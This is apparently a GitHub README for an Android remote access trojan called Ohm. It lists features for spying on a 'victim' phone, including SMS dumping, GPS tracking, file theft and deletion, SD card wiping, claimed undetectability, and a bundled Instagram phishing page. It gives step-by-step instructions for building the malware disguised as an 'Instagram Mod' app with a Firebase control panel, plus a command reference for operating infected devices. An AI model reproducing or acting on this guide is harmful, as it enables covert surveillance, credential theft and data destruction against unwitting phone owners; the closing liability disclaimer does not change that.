

Android RAT</h1> #### Android RAT built in Android APP for Android User
## Features - [X] Read , Delete Internal Storage Files - [X] Download Any Media to your Device from Victims Device - [X] Get GPS location - [X] Get Network Provider Location - [X] Get all the system information of Victim Device - [X] Shows all the installed apps in Victims Device - [X] Open Any Website in Victims Device - [X] Make any folder in Victims Device - [X] Show any notification in Victims Device - [X] Delete any File or Folder From Victims Internal Storage - [X] Dump SMS - [X] Play music in Victims device - [X] Change Wallpaper - [X] Vibrate Device - [X] Turn On/Off Flash Light - [X] Text To Speach Feature - [X] Runs In Background Even App is Closed - [X] Support Android v5 + - [X] No Port Forwarding Needed - [X] Fully Undetectable - [X] WipeSdcard - [X] Shows Update Page , if you want. - [X] Pre Binded [Instagram Webview Phishing](https://gitHub.com/Th30neAnd0nly/PI) --- ## Requirements * Firebase Account (or you can Create one) * Android Device :rofl: --- ## How to use 1. After Creating a Firebase account you have to enable Authentication , Firebase Storage , Realtime Database. 1. Make sure that you have selected USA region while creating database. 1. Now go to Authentication and at Sign In Method section enable Email/Password Method. 1. After that in Realtime Database Go to rules and set ``` .read ``` and ``` .write ``` to ```true``` 1. Also Set Some Data in your Realtime Database as shown in image. 1. 1. Now Go to Project Overview and add a new Android App and Download it's ```google-services.json``` file , which will contain your app's API key and other information. 1. Add another Web App and Copy it's ``` Config ``` . 1. You can setup your web panel on localhost or on Any Hosting Site. 1. Open ``` app.js ``` and paste the ```Config``` and save it . 1. Your Web Panel is ready now let's build the App. 1. Download [Sketchware Pro](https://www.mediafire.com/file/989up6hj5i89kak/Sketchware_Pro_6.3.0_fix1.apk/file) 1. Click on Restore option and select ``` Instagram Mod.swb ``` file in Sketchware Pro 1. Now open the project and in Library Menu go to Firebase Section and fill all the data using ```google-services.json``` file. 1. In Project ID Field after putting your Project Name add ``` -default-rtdb``` . Example > myproject```-default-rtdb``` 1. 1. Now click on **Run** to Build the App , use any APK Signer Tool to sign it. 1. You app is Now ready. 1. When user will install the app his/her session will appear on Web Panel click on the User to establish Connection with that specified Device. ### Tutorial Video Part 1 | Part 2 -------|------ [![Part1](/Ohm/images/thumbnail1.png)](https://th30neand0nly.github.io/Ohm/images/part1.mp4) | [![Part2](/Ohm/images/thumbnail2.png)](https://th30neand0nly.github.io/Ohm/images/part2.mp4) Credits: Linuxndroid --- ## List of Commands Command | Definition | Example and Usage --------|------------|--------- openfolder * | This will Show the contents of Folder | ```openfolder * /sdcard/DCIM ``` uploadfile * | This will Upload File To Firebase Storage From Device | ``` uploadfile * /sdcard/DCIM/Camera/image.png``` deletefile * | This Will delete the specific file or folder | ```deletefile * /sdcard/DCIM/Camera/image.png``` makefolder * | This will create a Folder | ```makefolder * /sdcard/My Folder/``` shownotify * | This will show notification | ```shownotify * Your Message``` openweburi * | This will open external URL | ```openweburi * https://github.com/Th30neAnd0nly/Ohm``` playsmusic * | This will play the music in Victims Device from the given music URL | ```playsmusic * https://www.soundhelix.com/examples/mp3/SoundHelix-Song-1.mp3``` vibratedevice * | Vibrates the victims Device for 'x' milliseconds | ``` vibratedevice * 500``` speachtext * | This will Use Text To Speach to output your message | ``` speachtext * How are You``` deviceflashon | Turns on the flash light of device | ```deviceflashon``` deviceflashoff | Turns of the flash light of victims Device | ```deviceflashoff``` changewallpaper | Changes the device wallpaper to [this](https://github.com) | ``` changewallpaper``` internaldir | Shows the Internal Storage files and Folders | ```internaldir``` installedapps | Shows the package name of all the installed apps | ```installedapps``` sysinfo | Shows The System Information | ```sysinfo``` dumpsms | Dumps all the SMS and uploads file to Firebase Storage | ```dumpsms``` showphishdata | Shows the Phished Credentials of [Instagram](https://github.com/Th30neAnd0nly/PI) | ```showphishdata``` getgpslocation | Shows the GPS location | ```getgpslocation``` getnetworklocation | Shows the Network Location | ```getnetworklocation``` help | Shows all the commands | ``` help``` clear | Clears the Web Terminal | ```clear``` --- # Made with :heart: in Sketchware --- ### ❤️Supporters❤️ [![Stargazers repo roster for @th30neand0nly/Ohm](http://reporoster.com/stars/dark/Th30neAnd0nly/Ohm)](https://github.com/Th30neAnd0nly/Ohm/stargazers) [![Forkers repo roster for @th30neand0nly/Ohm](http://reporoster.com/forks/dark/Th30neAnd0nly/Ohm)](https://github.com/Th30neAnd0nly/Ohm/network/members) ## DISCLAIMER


The use of the OHM is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read [LICENSE](/Ohm/LICENSE).